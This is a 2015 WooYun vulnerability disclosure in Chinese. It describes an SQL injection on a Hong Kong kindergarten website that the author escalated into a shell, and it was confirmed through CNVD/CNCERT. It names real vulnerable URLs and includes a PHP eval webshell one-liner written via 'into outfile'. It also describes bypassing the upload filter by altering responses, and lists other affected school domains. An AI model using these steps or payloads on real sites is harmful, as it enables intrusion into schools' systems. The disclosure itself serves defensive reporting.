当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0100693

漏洞标题:一个注入可拿下香港上百个幼儿园官网

相关厂商:cncert

漏洞作者: starry

提交时间:2015-03-12 11:32

修复时间:2015-04-26 11:34

公开时间:2015-04-26 11:34

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:10

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-03-12: 细节已通知厂商并且等待厂商处理中
2015-03-17: 厂商已经确认,细节仅向厂商公开
2015-03-27: 细节向核心白帽子及相关领域专家公开
2015-04-06: 细节向普通白帽子公开
2015-04-16: 细节向实习白帽子公开
2015-04-26: 细节向公众公开

简要描述:

服务器有加固,可提权拿下shell

详细说明:

首先从注入开始:http://www.cmyl.edu.hk/php/webinfo/show.php?id=2

8.jpg


root权限,于是想直接写入shell。找到报错http://www.cmyl.edu.hk/php/calendar/calendar.php?month[]=111,得到路径/home/www/kindergarten/cmyl/php/calendar/calendar.php

QQ截图20150311152331.jpg


直接通过sql写文件到/home/www/kindergarten/cmyl/php失败。猜测目录被限制写入,找到一个图片地址http://www.cmyl.edu.hk/php/webinfo/fdpic.php?picpath=updatepic/uploads/20130210000952175.JPG。
于是猜测真实地址是/home/www/kindergarten/cmyl/php/updatepic/uploads/20130210000952175.JPG 事实证明没错,访问http://www.cmyl.edu.hk/php//updatepic/uploads/20130210000952175.JPG可看到图片。
所以说/home/www/kindergarten/cmyl/php/updatepic/uploads可以写入。但执行select '<?php @eval($_POST[\'wooyun\'])?>' into outfile '/home/www/kindergarten/cmyl/php/updatepic/uploads/wooyun.php'却无法得到shell。
于是回归原始方法,找后台,跑了很多路径,最后得到后台地址:http://www.cmyl.edu.hk/php/login/update.php
注入得到账号密码:

1.jpg


登陆后,在后台的 通告功能中添加,上传文件。
由于此处上传比较特殊,弹窗出来,使用GET www.cmyl.edu.hk/php/updatepic/public/upload/swf/Swiff.Uploader.swf实现上传,导致firebug和burp等工具无法抓到上传文件的数据。前端限制了上传格式。
于是burp抓包,修改上传页面返回的数据包,将php添加入允许的格式,返回给浏览器。

3.jpg


接下来可以直接上传php格式。

3.jpg


4.jpg


5.jpg


6

6.jpg


根据之前得到了路径和返回的shell文件名信息,得到shell真实路径。
http://www.cmyl.edu.hk/php/updatepic/uploads/20150311150856214.php

7.jpg


服务器中大部分文件夹是按照域名命名的,总共有234个文件夹。

111.jpg


从文件夹推出域名,以B开头的文件夹为例,11个文件夹。
bcrotaryclubkg
bcsgkg
bcykgtc
bcytc
belight
bfhkwts
bfhkwts_backup
Bilok
blessingkg
bokangkg
bstfk
其中存在域名的有6个。
www.bcrotaryclubkg.edu.hk
www.bcsgkg.edu.hk
www.bcykgtc.edu.hk
www.belight.edu.hk
www.bfhkwts.edu.hk
www.blessingkg.edu.hk
按照概率算一下,影响大概有100个网站吧。

漏洞证明:

修复方案:

版权声明:转载请注明来源 starry@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:11

确认时间:2015-03-17 09:40

厂商回复:

CNVD确认并复现所述情况,转由CNCERT尝试向HKCERT通报。

最新状态:

暂无